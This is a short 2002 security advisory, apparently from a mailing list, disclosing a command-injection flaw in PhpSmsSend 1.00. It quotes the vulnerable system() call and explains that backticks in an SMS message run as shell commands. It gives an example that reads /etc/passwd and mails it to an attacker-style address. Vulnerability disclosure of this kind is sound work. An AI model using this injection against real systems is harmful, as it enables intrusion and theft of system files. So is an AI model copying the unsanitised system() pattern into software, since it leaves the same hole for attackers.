PhpSmsSend remote execute commands bug

From: Indra Kusuma (indraat_private)
Date: Tue Jan 29 2002 - 10:57:51 PST

    ---[ PhpSmsSend remote execute commands bug

    ---[ About PhpSmsSend

       PhpSmsSend is a frontend to the SmsSend application. It consists of a
    .php file, from which you select one of the available scripts, and then
    you can send an SMS wherever you want, all around the world.

    PhpSmssend's website is http://zekiller.skytech.org/smssend.php

    ---[ Affected System

      PhpSmsSystem Version 1.00

    ---[ Description

    from file .php :

          $str = SMSSEND." ".SCRIPTSPATH.$script." $params -- -d 0 ".PROXY;
          system($str,$res);

    if the sms messages contain a backtick "`" then inside of backtick will be
    execute as a system command.

    the result of the command will send via sms :), so the command output
    should be less than 160 characters to send via sms, but if the command
    using pipe (ex : cat /etc/passwd|mail evilat_private) or redirection then
    the messages status is successfully :)

    ---[ Greetz

    my Guru GaniSalman, my friend OpsCrew, #indoSniffing and
    #medanHacking (DalNet), Fate Research Labs (www.fatelabs.com), LUG STIKOM
    (lug.stikom.edu), and the gauli.com owner

    ---

    cheers,

    IndraKusuma